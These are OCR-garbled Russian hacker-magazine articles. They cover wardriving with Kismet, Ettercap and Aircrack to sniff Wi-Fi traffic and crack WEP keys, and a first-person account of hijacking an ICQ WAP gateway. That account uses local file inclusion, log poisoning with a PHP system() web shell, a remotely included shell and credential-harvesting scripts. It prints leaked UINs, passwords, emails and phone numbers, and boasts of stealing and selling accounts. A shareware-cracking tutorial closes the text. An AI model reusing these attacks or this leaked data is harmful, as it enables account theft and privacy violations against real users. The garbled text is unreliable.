Отдает скрипткидингом? Нет? Ну и правильно 
:). В общем, мы сегодня будем перехватывать 
трафик, который болтается в воздухе. Кстати, 
«бпііТ» в переводе с английского означает 
«нюхать». Так что... 



Из огромного набора вардрайверского софта 
нам понадобятся такие монстры, как Кізтеі, 
ЕКегсар и АігСгаск. Если о первом и последнем 
было написано немало и в этой статье я затрону 
лишь некоторые ихтонкости, то про Еііегсар мы 
поговорим подробнее: установим, рассмотрим 
его основные возможности, разберемся, какой 
работает. Но сначала немного истории и теории. 
Программа ЕКегсар увидела свет25 января 
2001 года благодаря Магсо ѴаІАегі (Ыаба) и АІЬеііо 
ОгпадЫ (АЕоР). Много воды утекло стех пор. Про- 
грамма оченьсильно подросла какв размере, 



так и в своих возможностях, реализованных 
различными функциями и примочками. С 5 июля 
2004 года она стала сильно похожа на ту, какой мы 
знаем ее сейчас. Появились версии под все рас- 
пространенные платформы, такие как*В50, *піх, 
Мае 05 и даже ѴѴІпсіоѵѵб. Программа использует 
АРР роізопіпд и тап-іп-іЬе-тісІсІІе, чтобы пере- 
хватывать подключения междудвумя хостами. 
Того же можно добиться, используя МАС-ЬазесІ 
БпНТпд тобе. ЕМегсар позволяет перехватывать 
55Н1 , НТТР5 и другиезащищенные протоколы, 
расшифровывать пароли для следующих 
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> «Три девицы подокном пряли поздно вечерком...» 



протоколов: ТЕІ_МЕТ, РТР, РОР, РЮ6ІЫ, 55Н1 , ІСС1, 5МВ, МуЗОЦ НТТР, 
ЫЫТР.ХІ 1 , ЫАР5ТЕР, ІРС, РІР, ВОР, 50СК5 5, ІМАР4, ѴІМС, ЮАР, N Р5, 
5ЫМР, НАИР Ы РЕ, ОІІАКЕЗ, М5Ы, ѴМ5Ѳ. Программа может перехватывать 
пакеты, не подключаясь ксети. Нам это может пригодиться, например, в 
ситуации, когда имеется удаленная беспроводная сеть с очень мощной 
антенной и передатчиком, причем наше оборудование сеть видит, но под- 
ключиться не может, поскольку мощности наших примочек не хватает на то, 
чтобы посылать в нее пакеты, а вотловить— пожалуйста. Итак, поехали! 

О В чан с головой 

Установка Екегсар ничем не отличается отустановки какой-либо другой 
программы под Иі п их: 

ИНСТАЛЛЯЦИЯ ИЗ ИСХОДНОГО КОДА 

каг — 2 хѵ б еккегсар-БС- 0.7.3. каг . дг 

ссі еккегсар-БС-0 .7.3 

зисіо сопкідиге 

зисіо таке 

зисіо таке іпзкаіі 

После установки программы надо бы запустить ее и посмотреть, что она 
может. Существует версия для 6ТК+, но я предпочитаю консольную. За 
запуск консольной версии отвечает ключ -С’: 

зисіо еккегсар — С 

Дальше — как показано на скриншотах: «Зпііі -> ІІпіІіесІ впікіпд -> 
Тасе_пате -> Рііе -> ЗіаНзпікіпд». 

Теперь осталось направить антенну в нужную сторону и собирать красиво 
вываливающиеся пароли. Если сеть шифрованная, но у нас имеется 
ключ, то Екегсар можно его скормить и все шифрованные пакеты будут 
разобраны по кусочкам. 

На этом ликбез по программе ЕМегсар окончен. Еслиты заинтересовался, 
можешь почитатьо ней в Сети, благо информации по нейтам очень много. 

> Процесс запуска программы 



Атеперь я расскажу отом, какодновременно, используя одну карточку, 
собирать уязвимые ІѴ5-пакеты, ломать ключ, заныканный в этих пакетах, 
и снифать близлежащие нешифрованные, либоуже с ломаным ключом 
сети. 

□ Надфилем по конфигу 

Первым делом нам понадобится поправить конфиг Кізтек 

зисіо тсесіік /екс/Кізтек/кізтек . сопк 
. . . находим в нем строки: 

# Бо ілге ѵгсгіке сіака раскекз ко а РІРО ког ап ехкегпаі 
сІака-ІБЗ (зиск аз 

Зпогк ) ? 

# Зее кке сіосз Ьекоге епаЫіпд ккіз. 

# к і к о= / ктр / кі зтек_сіитр 

Убираем символ комментария перед параметром Іііо, чтобы получилось: 

к і к о = / ктр / кі зтек_сішпр 

Закрываем конфиг (с сохранением) итопаем в другое окно/вкладку 
терминала. 

□ Уже не просто сито 

Для начала нам нужно запустить КізтеС чтобы он создал іетр-файл, из 
кото ро го будет ч итать ЕНе гса р . 

Не обращая внимания на матерок, переходим кдругому окну и запускаем 
Екегсар с параметром ‘-г’ (это ключ чтения файла), указывая на іетр- 
файл, создаваемый конфигом. 

Рккегсар — С -г /ктр/кізтек_с!шпр 

Затем: «Зпік -> ІІпіІіесІ зпікіпд іасе_пате». Теперь вместо имени 
интерфейса пишем «а Ц» или «апу». 



Рііе | 


БіІІТТІ 


А 


ріірпіі неір 




I 


і 





|ЦпШе<) иіШілд 



В^ісдс-а ЕПіТтіпд... 
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>Внимание! Инфор- 
мация предоставле- 
на исключительно 
в ознакомительных 
целях! Ни автор, ни 
редакция за твои 
действия ответствен- 
ности не несут! 




> НИр:// 

кізтеіѵѵігеіезз.пеі 

— документация по 
Кізтеі, примеры 
настройки и сам 
Кізтеі. 

ЬіірѴ/еііегсар. 

зоигсеіогде.пеі 

— документация по 
Еііегсар, примеры 
настройки и сам 
Еііегсар. 

ЬіірѴ/ѵѵагсІгіѵіпд пзк. 
[іѵефигпаі.сот — со- 
общество вардрай- 
веров в ЖЖ, которое 
я модерирую. 




> Описанный в статье 
метод подойдет не 
только для универ- 
сального снифа. 
Мной он был заюзан 
из-за невозможности 
работать по-другому 
в связи стем, что 
моя карта на чипсете 
ргізт2, у которого 
большие сложности 
с Еііегсар при работе 
напрямую. Послед- 
ний просто не желает 
показыватьтрафик, 
этаким образом 
можно использовать 
Еііегсар при этом 
чипсете. 
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Переключаемся на терминал с Кізтеі и запускаем его. Он 
должен запуститься, после чего нужно вернуться к Еііегсар 
и продолжить запуск: «Еііе Біагі зпііііпд Ѵіеѵѵ-> 
соппесііопз». 

Ура! Теперь у нас одновременно дампятся уязвимые 
ІѴ5-пакеты и снифается трафик остальных сетей. Оста- 
лось прикрутить к этой схеме аігсгаск-пд, что делается 
очень просто: 

аігсгаск-пд /ѵаг/1од/кізтек/Кізтек-имя_ 
лога . сіитр 

Еще хочу добавить, что Еііегсар поддерживает всевозмож- 
ные плагины, которые можно, немного погуглив, надергать 
из Сети, или же наклепать самому под свои нужды. Но это 
уже отдельная тема, которую я затрону в следующий раз. 

□ Пилюля скипидара 

Для увеличения скорости взлома ѴѴЕР можно использо- 
вать утилиту ѵоісіі 1 . Но для этого нужна еще одна карта 
на вардрай вере ком чипсете, а еще лучше — второй ноут 
в руках друга, который будет флудить с помощью нее. В 
последнем случае вам или, по крайней мере, второму ноу- 
ту нужно находиться на расстоянии, которое позволит его 
железу посылать пакеты в сеть, а нетолько принимать. 
Хотя опятьже некоторые вшитые интеловые чипсеты могут 
работать как с Кізтеі, так и с Еііегсар, так что можно заюзать 
карту на ргізт для ѵоіб и тем самым обойтись одним ноутом :). 
Приводить примеры такого железа вжурнале я не буду, ноты 
всегда можешь написать мне на почту или задать вопрос в 
сообществе (смотри ссылки в боковых выносах). 

Все, выбирай сеть, ключ которой будет ломать аігсгаск, и 



наслаждайся тройной пользой. Пока все это работает, выпей 
чашечку кофе и послушай поучительную историю отом, как 
можно заработать на воздухе. 

□Храните воздух под замком 

Описанная схема принесла мне небольшую прибыль, а лицо, 
потратившееся на моиуслуги, вынесло для себя уроки... 
приказ об увольнении своего сисадмина. 

Имелось здание с двумя ѴѴІ-ЕІ сетями — одна была непло- 
хо прикрыта, вторая же открыта нараспашку. Так вот когда 
я тихонько стоял и курил бамбук, ожидая какого-нибудь 
результата, Еііегсар перехватил письмо (расшифровывать 
содержание писем он тоже может :), только с латиницей) 
в котором была строчка кеу : ВЕАВЕАВЕА345 (и так 26 
символов). А на что это похоже? Правильно, на 1 28-битный 
ключ от ѴѴЕР в Нех- исполнении. Кроме того, Кізтеі уже 
определил ззіб (широковещание которого было отключе- 
но) и маки клиентов (была фильтрация по МАО) той самой 
шифрованной сети. Ключ подошел, теперь можно было 
смотреть, кчемумыпришли.Апришлимык бухгалтерской 
сетке организации такой-то и могли бы ее поиметь, если 
было бы желание. 

Такимже образом знакомый, сидя на балконе с ноутом 
и чашкой кофе, перехватил адрес и логин/пасс какой-то 
банковской базы, не говоря уже о куче I СО, етаіГов и других 
аккаунтов. 

Все написанное работает на Еіпих-системах. На В5й идут 
другие драйверы, и ручаться за нихя не могудаккакне 
проверял сам. Всетри описанные программы есть также под 
ѴѴІп. Но если Кізтеі и АігСгаск мне доводилось запускать под 
великим (я не побоюсьэтого слова)творением Б. Г, то Еііегсар 
нет, хотя я точно видел его на сайте разработчиков. □С 
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Если при нажатии 
на кнопку двигатель 
не завелся - срочно 
купите журнал «йца 





взлом 



призрачная угроз 



КАК ПОИМЕТЬ ТЫСЯЧИ 1С0-УИН0В 



т і 













Вместо предисловия хочу процитировать небезызвестного Зіер'а («Хакер», №78, рубрика 
«РА(3») : «В последнее время большую популярность снискал специальный ѴѴАР-сервис — 
ЫдрУ/Цаксот. Изумительная разработка поддерживает сети ІС(^ и М8И и предоставляет 
практически полный набор стандартных возможностей. Ради твоей безопасности сервис 
не сохраняет пароли — их каждый раз приходится вводить заново (или забивать в телефо- 
не закладку типа Ъкр : /Дѵар.Цаі:.сот/1?и = ІС<3&р = равз) ». 



□ Завязка 

Мне всегда хотелось иметь много-много краси- 
вых номерков I СО, но брутить итроянить их мне 
мешала лень. Я сзавистью смотрел на облада- 
телей элитныхуинов, постепенно выстраивая 
план своихдействий. И вотв октябре прошлого 
года, случайно обратив внимание на I СО-ѴѴАР 
шлюз МНрУ/Цаксот . я задумался, а не сохраняет 
ли этот сервис номерки своих пользователей 
куда-нибудь в базу данных или в логи? Начав 
копать скрипты шлюза и ничего хорошего не 
обнаружив, я обратил внимание на форум 
ШрУЛогит.б’аІ.сот . Движок рбрЬЬ был, скорее 
всего, последней версии, так как ни одна из 
известныхуязвимостей не прокатывала. Но это 
не остановило мои хацкерские порывы :). Для 
форума был установлен ѵѵар-мод рбрЬЬѴѴарѲаіе, 
на поверку оказавшийся дырявым. 



□ Первые шаги 

Итак, подставив в первыйже попавшийся пара- 
метр кавычку: ЬирУЛогитз.^аІ.сот/ѵѵар/ѵѵарІоріс. 
рЬр?5=0&Іоріс=352&Іюгипп=1 яувидел ошибку: 

Еаііесі оЪкаіпіпд когшп ассезз 
сопкгоі 1ізкз<Ъг /хЪг 
/><Ьхи>БЕВШ МОБЕ</их/ЬхЬг 
/хЪг />80Ь Еггог : 1064 Уои каѵе 
ап еггог іп уоиг 8<2Ь зупках. 

СЬеск кке шапиаі Скак соггезропсЗз 
ко уоиг МуЗОЬ зегѵег ѵегзіоп 
ког кке гідкк зупках ко изе пеаг 
* V * ак Ііпе 3<Ьг /><Ьг />8ЕЬЕСТ 
а.когиш_і(5 / а . аикк_ѵіеѵ\/, а.аикк_ 
геасі, а . аикк_розк , а . аикк_гер1у , 
а . аикк_ес1ік , а . аиккхЗеІеке , 
а . аикк_зкіску , а . аикк_аппоипсе , 



а . аикк_ѵоке , а . аикк_ро11сгеаке 
ЕЕОМ ркрЬЬ_когишз а ШЕКЕ 
а. когит_іс1 = 1\ ' 

Наметанный глаз заядлого рбрЬЬ’шника 
сразу заметит бесполезность этой ошибки, 
так как, во-первых, кавычка экранируется, а 
во-вторых, весь запрос идет только в таблицу 
рЬрЬЬ_іюгипп5 и файл аиіЬ.рбр. Здесьлишь 
данныетипа ІіпуіпіИ ), то есть одна цифра 
в каждой ячейке. С та кой ба гой многого не 
соберешь, использовать И N I О N нетсмысла, 
поскольку ни один хеш ни одного админа не 
вытащишь... Конечно, можно было перебирать 
все символы в хеше пароля через встроенные 
функции Му50І_, носнова помешала лень. Не 
отчаявшись, я продолжил свои исследования 
и нашел еще несколько бажных параметров 
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типа НЛрѴ/іюгитБфаЕсот/ѵѵарА/ѵартізс.рІір/асІіоп^оги 
т8Логшп=1 но все они опятьже обламывались на файле 
аиЖ.рЬр. Не найдя ничего полезного на форуме, я снова 
полез на основной сайт мессенджера. 



заинклудить его с помощью уже известной баги? Итак, соору- 
жаем небольшой рЬр-скриптдля отсылки нужного нам кода: 

<? 



□ Развитие сюжета 

Залогинившись под левым уином, я попробовал вставлять 
разныехитрые символы во всевозможные параметры 
скриптов шлюза — опятьже ничего не получалось. Совершив 
процедуру л огаута и совершенно ни на что уже не надеясь, я 
попытался проверить самый простой и безобидный параметр 
Іа пд следующим запросом: 

Ъ.ССр: //мар.СбаС . сот/ ?1апд=ги 



$зіСе= ' і . С б аС . сот ' ; //адрес сайта 
$раСІі= ' / ' ; //путь к уязвимому скрипту 
$іпзесС='<? зузЕет ( $_СЕТ [стсі] ) ?>'; //рЪр- 
инъекция 

$бр = Сзоскореп ( $зіСе , 80, $еггпо, $еггзСг, 
30 ) ) 

$оиС = "СЕТ $раСЪ. НТТР/1 . 1\г\п" ; 

0$оиС .= "НозС : $зіСе\г\п"; 

$оиС .= "СоппесСіоп: С1озе\г\п" ; 

$оиС .= "Юзег-АдепС : $іп^ есС\г\п\г\п" ; 
іімгіСе ( $:Ер , $оиС) ; 
бсіозе ( $бр) ; 



?> 



На это система мне благополучно выдала все свои секреты: 

Запустив этотскрипту себя на локалхосте и убедившись в 
Шагпіпд: таіп() : ШаЫе Со ассезз /изг/ том, что он сработал, я соорудил ядовитую ссылку: 

1оса1/арасЪ.е/1тРс1осз/мар/теззадез . т . . 






йССр : / /мар . С б аС . сот/ ?1апд=ги 



іп /изг/ІосаІ/арасЪе/ЪСсіосз/мар/зеСІапд . 
рйр оп Ііпе 2 69 

Радости моей не было предела! Хоть это был и сложный 
локальный инклуд, но все же инклуд! Теперьоставалось 
только залить куда-нибудь на сервер р’аі.сот свой шелл. 

Я снова пошел на форум, наивно полагая, что туда можно 
залитьаватар, нотакой возможности не было... Не отча- 
явшись, я решил посмотреть/еіс/раззѵѵб. Первый запрос 
Ьіф://уѵарфаЕсогп/? Іапд=ги.. /../../..А./.. /. ./. ./. ./. ./. ./. ./. ./ еСс/ 
раззѵѵсі ничего не дал, но второй — Ьир://ѵѵар.ЦаСсот/ 

?1а п д =ги/. ./. ./. ./. ./. ./. ./. ./. ./. ./. ./. ./. ./. ./ еіс/ ра ббѵѵсі с дополнитель- 
ным слешем после 1апд=ги — выдал мне все содержание фай- 
ла. Это уже было что-то, но оставалось еще локально залить 
шелл. Немного подумав над планом дальнейших действий, я 
решил посмотреть файл ЫНрб.сопВ 

ЫзСр : / /мар . Об аС . сот/ ?1апд=ги 
/изг/ІосаІ/арасЬе/сопС/ЪРСрсІ. сопб 



изг/1оса1/арасЬе/1одз/ітос!е_ісд. сот 
— ассезз_1од 

Перейдя по ней, я крупно обломался, поскольку на сервере 
был включен рЬрза^е_тобе. Но, какты догадываешься, 
дорогой читатель, это меня не остановило :]. 

О Кодерские будни 

Затарившись пивом и чипсами, я снова стал смотреть 
ЬЛрб.сопб обнаружил очередной поддомен — ІетрфаЕсот и 
его логи — іетрфаі.сот-ассез5_Іод, которые по размерутоже 
оказались идеальными для рЬр-іп^ес1; , а. Дальше я нашел свой 
скриптик, описанный в моих предыдущих статьях. ЫПрУ/ѵѵарр. 
гиДгазН/біг.ІхІ: . который может читать директории, выполнять 
код и открывать файлы в за^гтюбе, переименовал его в 
іезШбрд и залил на бесплатный обменникфайлов на ШрУ/ 
ѵѵеЬ.ѵѵаріпд.ги . Какты, вероятно, уже догадался, я записал в 
логи ІетрфаЕсот значение«<? іпсіибе ' Ьир ://ѵѵеЬ.ѵѵа ріпд . 
гиЛНезЛезШ^рд'; ?>». Теперь ссылка выглядела так: 



Внимательно изучив полученные данные и обнаружив среди 
них некий сайт іфаЕсот . я решил посмотреть его лог. Он был 
довольно небольшим — что-то около килобайта. Ты спро- 
сишь, кчему все эти действия? Читай дальше :). 

□ Первыеуспехи 

Если локальный шелл никаким образом залить нельзя, то 
отчегоже не внедрить нужный код прямо в лог, а потом 



ТЩСр : / /мар . Сз аС . сот/ ?1апд=ги/ 

изг/ІосаІ/арасЬе/Іодз/Сетр . С^аС . 
сот-ассезз_1од& 

Я перешел по ней, и моему взору открылась чудная картина — 
списокфайлов в веб-директории і]'аі. сот (смотри скриншот). 





> Ьир:/Логит. 
азесЬка.гц/ 
збоѵѵіЬгеаб. 
дЬд?І 526М8 — об- 
суждение баги на 
асечке; 

> ЬирУ/ісдіпбо.т — 
публикация о баге 
на известнейшем 
портале асечников; 

> Ы:1: р ://^ Іоѵ. о гд/ 
пеѵѵз п9Я4 безс- 
иІесЬка-іпЬгтасіі- 
з-ѵѵѵѵѵѵд'аІсот.ЫтІ 

— обсуждение баги 
на ЗЛОМ; 

> \ллл/ѵѵ.ещги/іпбех. 
рИр?ас1:=апоп5е5 
&пит=22 — 
инфо об описанной 
баге в ЕЖ; 
> ѵѵ\ллл/.батаде1.аЬ. 
огд/іобѵегзіоп/ 
іпбех.рЬр?1=17027 

— статья на 
дамаджлабе. 




> Все описанное 
в статье является 
плодом больного 
воображения автора. 
Любые совпадения 
с существующими 
сайтами случай- 
ны. Ни редакция, 
ни автор не несут 
ответственности за 
любой возможный 
вред, причиненный 
материалами этой 
статьи. 
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«к 

ІСО#: 
кд с 

РаКЧКМІ: 

СопггесЕ 

ЕБВДШй 

Е?пі;тЬ?г Цд 

СЬапое Іапаиаде 
В зск {о Тіа (.сот 



> Мзп-аккаунты 



>ІМ-пейджер вѴѴАР 




Затем я отыскал директорию с логами: 

Ьббр : / /мар . б^ аб . сош/ ?1апд=ги 

/изг/1оса1/арасЬе/1одз/бетр . 
б] аб . сот- 

ассезз_1од&&с!іга= /Іодз 

Мое внимание сразу привлек лог Іо1;а 1_1:] а 1; . 
сот-ассе55_1од, весил он немало — аж 
1981336,5 Кб. Обычными средствами рбр 
открыть его было невозможно. Не особо 
расстроившись, я немного погуглил на 
этутему и написал небольшой скриптик, 
позволяющий открывать такие большие 
файлы: 

<? 

бипсбіоп Ьідбііе ( $6ііепате) { 

$6(3= бореп ( $6ііепате , "г"); 
мЫІе ( ! беоб ( $6с1) ) { 

$Ьи66ег = бдебз ( $6сЗ, 4096); 
есбю $Ьи66ег ; 

} 

бсіозе ($6(3) ; 

} 

Ьідбііе ( ' /изг/Іосаі/арасЬе/Іодз/ 
6о6а1_6за6 . сош-ассезз_1од 1 ) ; 

?> 

Загрузив часть лога, я изучил его структуру и 
изменил свою функциютак, чтобы она выводила 
только асечные номера и пароли: 

бипсбіоп Ьідбііе ( $6і1епате) 

{ 

$6(3= бореп ( $6ііепате , "г"); 
вдМІе ( ! беоб ($6сЗ) ) { 

$Ьи6 бег = бдебз ($6(3, 20*4096); 
ргед_табсЬ_а11 ( ' / 
ісд_иіп= ( [0-9] {5,9}) &ісд_ 
рмс!= ( .*) (&ІНТТР) /і ' , 

$Ьи66ег , $табсЬез ) ; 



$табсЬез[0] = аггау_ 
ипідие ( $табсЬез [ 0 ] ) ; 

! ешрбу ( $шабсЬез [ 0 ] [0]) ? ргіпб 
$табсЬез [ 0 ] [ 0 ] . " \п" : ' 
бсіозе ( $6(3) ; 

} 

} 

В результате браузер выдал мне кучу неупоря- 
доченной информации, содержащую пароли и 
номера. Теперь их надо было как-то очистить от 
лишнего мусора и систематизировать. Для этого 
я снова применил свои кодерские способности и 
написал простенький парсер, который выводил 
мнеупорядоченный списокбез повторов в форма- 
те иіпіраззѵѵогб и общее количество всех номеров: 

<?рЬр 

зеб_біте_1ітіб (12 0) ; 
бипсбіоп Ьазіс_гер1асе ( $з ) 

{ 

$з=ргед_гер1асе ( " /ісд_ 
иіп= ( [0-9] {5,9}) &іс д р мсі= ( . *) ( 
ІНТТР) /і" , " $ 1 ; $2" , $3) ; 

$з=ргед_гер1асе ( " /НТТР ( . * ) / 

I" , " $ 1 - $ 2 " , $ з ) ; 

$з=збг_геріасе ( * [КЕБІКЕСТ/ 

302] 1 , 1 1 ,$з) ; 

$з=збг_гер1асе ( ' боег ' , ' 1 , $з) ; 
$з=збг_гер1асе ( ' грОб 1 , ' 1 , $з) ; 
$з=збг_гер1асе ( ' => ' , ' ' , $з) ; 

$з = збг_гер1асе ( ' ','',$ з ) ; 

$з=збг_геріасе ( ' &#9001 ; ' , 1 1 , $з) ; 
$з=ргед_гер1асе ( " / 

= (Ье I ги I еп | зѵ) /і" , 1 ' , $з) ; 

$з=ргед_гер1асе ( " /\ [ ( [0- 
9] {1,9}) \] /і" , " ,$з) ; 
гебигп $з ; 

} 

ргіпб ' <Ьбш1хбіб1е>рагзег</ 
біб1е><Ьо(Зу> ' ; 
іб (іззеб ( $иг1а) && 

! ешрбу ( $иг Іа) ) $иг1а=Ьазіс_ 
геріасе ( $иг!а) ; 



$иг1а=ехр1о(Зе ( " \п" , $иг1а) ; 
зогб ($иг1а,ЗОКТ_ЫЬМЕКІС) ; 
$иг1а=аггау_ипідие ( $игіа) ; 
бог ( $і=0 ; $і<соипб ( $иг1а) ; ++$і) 

{ 

'ешрбу ($иг1а[$і] ) ? ргіпб иг 1(3 
есо(Зе ( $иг1а [ $і] ) . ' <Ьг/> ' : ' 

} 

ргіпб соипб ( $иг1а) . ' <Ьг/> ' ; 
ргіпб '<6огш 

шебЬо(3=розб>Текст : <Ьг / хбехбагеа 
паше= "игіа" /х/бехбагеахЬг/ > ' ; 
ргіпб '<іприб буре= " зиЬшіб» 
ѵаіие= "Вбить !"/>'; 
ргіпб 1 </6огшх/Ъо(Зух/Ьбт1> ' ; 

?> 

Затем я запустил своетворениеу себя на 
локалхосте, вбил туда хаотичный списокс ^абсот и 
выполнил, получив в итоге список уинов и паро- 
лей (привожу небольшой кусочектут, да простят 
меня владельцы этих номеров): 

204685805; бабузЬка 
204755617; 120681 
204767779; дп12 60 
204845253; шахішко 
204876333 ,-12 345678 
204968096; 1д2аЗг 
205032105; 049989350 
2 0519173 1;аз(36дЬ. 

Приведенныездесьуины я нетронул, впрочем, 
как и остальные семи-, восьми- и девятизнаки, 
а на всех полученных шестизнаках с помощью 
товарища ОагкРиб'а были изменены пароли. 

Так что, если будет нужен короткий номерок, 
обращайся :). 

□ Развязка 

Итак. 1|абсопп предоставляет доступ не только к 
ІСО, ной к гп5п, причем влогахгшвп’овскихаккаун- 
тов раза в 3 больше, чем асечных. Я подумал, а по- 
чему бы несоставитьсписоктехже ЬоітаіГовских 
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> Номерки 



мыл, чтобы потом их пробить по базе ргітагу-таіі 
ббідуинов? Принявшисьза дело, сначала я изме- 
нил первую функциютак, чтобы скрипт показывал 
мне логи не аськи, а гшзп-аккаунтов: 

ргед_таксЬ_а11 ( ' / 
тзп_ассоипк= ( . * ) &тзп_ 
рѵгЬ= ( .*) ( & I НТТР) / 
і ' , $Ьиккег , $таксЬезЗ ) ; 

$таксЬез [ 0 ] =аггау_ 
ипідие ( $таксЬез [ 0 ] ) ; 

! етрку ( $таксЬез [ 0 ] [ 0 ] ) ? ргіпк 
$таксЬез [ 0 ] [ 0 ] . " \п" : ' 

А в парсере я подправил следующее: 

$з=ргед_гер1асе ( " /тзп_ 
ассоипк= ( . * ) &тзп_ръ/с1= ( . * ) ( 

I НТТР) /і" , " $1; $2 ", $з) ; 

В итоге получился красивый списочек мыл, 
из которых на тысячу 5-8 стабильно были 
ргітагу к какому-нибудь шестизнаку. Привожу 
тут небольшой списочек (теперь пускай меня 
прощают владельцы этих мыл :)). 



АОБ Орз ; 71173 ; каре; ;; Ргі РеЬ 10 
2006 08:53:53 



С 23673 даже произошла очень веселая 
история: другие номерки админы забирали 
максимум через день, а этотя привязал кРам- 
бл ер- 1 СО и при любой попытке админа забрать 
его обратно возвращал его себе :]. Это продол- 
жалось около месяца, пока админ не додумался 
убить в базе аськи значение с привязкой этого 
номера. 

На сладкое приведу здесь кусочек контакт- 
листа 35555: 

ІС<2 ; 10008; Огеу Сіі-уат; ;+972 
(52) 4872322 ЗМЗ;Ргі Зер 23 2005 
11:08:38 

ІСО ; 1 0 0 0 9 ; Тотег ; ; ; Зип Зер 2 5 
2005 13:00:09 

ІС<2; 11221 ; Біак -Мгкк; ; ;ТЬи Маг 
30 2006 13:28:59 
Сепегаі ; 65656 ; Рікап ЗЬау ; ; +972 
(55) 766582. ;Ргі РеЬ 10 2006 



Небольшое примечание: 1 0008 — са 
главный человек в аське, так что звон 

ПИШИ БГПБ :). 






03 . ы. 

После благополучного использования баги 
втечение пяти месяцев во мне взыграла 
жадность, и я решил продать ее. Поместил 
объявление на асечке, прошел гаранта, и 
тутзнающие люди начали копать... В итоге 
все узнали про бажный сервис и некоторые 
чуть не докопались до сути. Поняв, что с меня 
хватит такого геморроя, я написал эту статью 
и сообщил о баге администраторам сервиса, 
которые ее благополучно и прикрыли. Кстати, 
после публикации на асечке реакция админов 
последовала незамедлительно — у себя на 
форуме они написали, что Цаксот не ведет 
никаких логов, им оченьжаль людей, которые 
потеряли номерки, ноадмины и ихсервис ни в 
чем не виноваты: 



Бас1а11ак@Ъ.октаі1 . Сот; кагоик1975 
сикета1ік9@Ьоктаі1 . сот; 456321 
Беѵіі . МакгіхОЬоктаіІ . Сот; 

2081988 

Сгпо_з1акко_рі1е@Ьоктаі1 . сот; 
901901 

МЗазза1_кеккеЬкеп@Ъ.октаі1 . сот; 
сЬагЬеІ 

Прото, какя писал скрипты, которые сравнива- 
ют базы примаков и мои логи, рассказывать не 
буду, так как это отдельная и очень печальная 
история :). 



08:54:58 

Сепегаі ; 7050324 ; Сіагіззе; ; ;Ргі 

РеЬ 10 2006 08:53:53 

Сепегаі ; 77770 ; Веппу; ; ;Ргі РеЬ 10 

2006 08:53:54 

РгіепЬз ; 56666 ; Бап 

КодасЬеѵзку ; ; +972 (50) 

3089999 ; Ргі РеЬ 10 2006 08:54:58 
Сеіісот; 55155 ; Кап - 
Сеіісот; ; ; Ргі РеЬ 10 2006 
08:54:58 

Веіі МоЬіІіку; 102 8176 ; Ргіс 
СогЬеіІ; ; ; ТЬи Бес 23 2004 
13:31:59 



ТН'ак зузкет БОТ зкогіпд апу 
БІБ раззмогЬз (ТЬе ѵаіісіакіоп 
ргосезз із пок ѵ^ікЬ Т^ак ак аіі 
(Ісд.сот) , зо ъ;е Ьопк пееЬ кЬак 
іпкогтакіоп) , кЬе раззтлгогсіз 
зкогеЬ оп уоиг тоЬіІе Ьеѵісе 
Ьітзеік, аз а рагк ок кЬе 
КететЬегМе кеакиге. 

Ріеазе сопзіЬег кЬак ѵ?Ьеп изіпд 
апу КететЬегМе кеакиге оп 
сеііиіаг ркюпез ак аіі БОБТ діѵе 
уоиг тоЬіІе ко окЬегз , ог гетоѵе 
кЬезе Ііпкз/соокіез кігзк, кЬеу 
сап изе ік ког аЬизе! ! ! 



□ Эпилог 

Отыскав эту багу, я получил очень и очень 
много элитныхуинов: шох, зеркал , ху и т.д. На 
одном из них (ххуххх) сижу до сих пор :). А чтобы 
ты, дорогой читатель, возрадовался, открою 
тебе небольшой секрет. Сервис р’аКсот очень 
любятасечные админы, я уводил такие их 
номерки, как: 



Веіі МоЬіІіку; 62381992 ;Ме11іе 
Сікж; ; ; Ргі РеЬ 10 2006 08:54:59 
ВідМіг Бкгіпе; 1412223 64 ; . . . 
Уагозіаѵ. . . ; ; ;Моп Биі 24 2 00 6 
13:04:57 

АО Б Орз ; 2 07 02 012 ; Ракгіск; ; ; ТЬи 
Бес 23 2004 13:30:55 
АОБ Орз; 54662 ; ІСО БОС; ; ;Ргі РеЬ 
10 2006 08:54:58 



Охотно им поверим и закончим на этом :]. 
Пользуясь случаем, передаю спасибоза 
моральную поддержку СазЬ, Юеі еТ], Р1 00й 
РОѵѵЗП, ОагкРиІІ, 2абагед, всем, кто принимал 
участие в развитии этой истории на асечке и 
злом, а также админам р’аксопп за то. что они 
всеже прочитали мой мейл и приняли меры по 
устранению уязвимости :). ~г 
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1ЕОНИД «СВ@ѴУІ_ЕВ» исупов; 







нй;-. 





ОБХОД ЗАЩИТЫ ТВИКЕРА РКЕ5Н1Л 

Может быть, ты пытался взломать программу, которая тревожила тебя надоедливы- 
ми нагами. Результатом этого, наверняка, был шок: вместо читабельного листинга 
отладчик выдавал код, похожий на мусор. Скорее всего, это произошло потому, что ты 
нарвался на запакованную программу. Сегодня я на простом примере покажу тебе, как 
бороться с пакерами. 



□ ІЫТРО 

Сейчас мы займемся программой РгезЫІІ (это 
неплохой твикер для ОС ѴѴІпсІоѵѵв). Вообще- 
то, программа для домашнего пользователя 
бесплатна, но после 1 1 дней ее использования 
начинает болеть голова отпоявления окошка с 
напоминанием отом, что мы должны заказать 
ключу разработчика (окошко, кстати, с каждым 
днем держится на экране все дольше и дольше). 
Может, кто-то и хочетзасветить свой почтовый 
ящики занести его в спам -л ист, но только немы. 
Мы пойдем другим путем. 

□ Распаковка 

В работе мы воспользуемся замечательным 
отладчиком ОНуйбд — для исследования нашей 
программы он подойдет лучше, чем монстру- 
озный ЗоШсе от Ыигшеда. Итак, устанавливай 
отладчик, если его все ещеутебя нет, и выбирай 



пункт меню «Рііе Ореп». В появившемся окне 
укажи путь к файлу нашей программы (ітевЬиі.ехе). 
Отладчиктутже сообщиттебе отом, что 
программа, возможно, содержит самомодифи- 
цирующийся код или упакованное тело. После 
нажатия «О к» ОНуйбд спросит, надо ли анали- 
зировать код. Эта медвежья услуга нам не по- 
надобится, ведь файл, скорее всего, запакован 
и никаких понятных листингов мы не получим, 
такчто смело отвечай: «N 0 ». Вот что мы видим, 
глядя на начало дизассемблированного кода: 

00565000 90 ШР 

00565001 60 РЮЗНАБ; Сохранение 

регистров в стек 

Опытный крякер, глядя на эти инструкции, 
обрадуется :), так как почти все упаковщики 
сохраняют регистры перед переходом на цикл 



распаковки и это их выдает, что называется, 
с потрохами. Аэто значит, нам нужно, следуя 
логике, найти команду восстановления всех 
регистров из стека (РОРАй). Само собой, эта ко- 
манда выполняется после распаковки. При этом 
нужнотакже учесть, что после этой инструкции 
должен следовать безусловный переход вида 
Э М Р N , где N — адресоригинальнойточки входа 
